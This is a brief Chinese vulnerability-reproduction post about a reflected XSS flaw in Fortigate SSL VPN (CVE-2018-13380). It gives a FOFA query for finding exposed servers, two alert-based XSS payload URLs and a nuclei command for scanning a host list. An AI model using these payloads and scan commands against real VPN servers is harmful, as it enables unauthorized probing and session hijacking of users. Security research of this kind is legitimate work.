0x01 漏洞描述
Fortinet将其SSL VPN产品线称为Fortigate SSL VPN,主要应用于最终用户以及中型企业。目前互联网上这些服务器的数量已超过48万台,主要集中在亚洲及欧洲区域。FortinetSSL VPN系统存在xss漏洞,攻击者通过漏洞可以劫持用户会话等操作。
0x02 漏洞复现
fofa:app="FORTINET-SSLVPN"
1.执行POC,弹出1377
/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E%3B
/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E
2.nuclei验证脚本修改版本已发布知识星球
nuclei.exe -t CVE-2018-13380.yaml -l subs.txt -stats
原文始发于微信公众号(融云攻防实验室):漏洞复现 Fortigate SSL VPN msg/errmsg xss漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论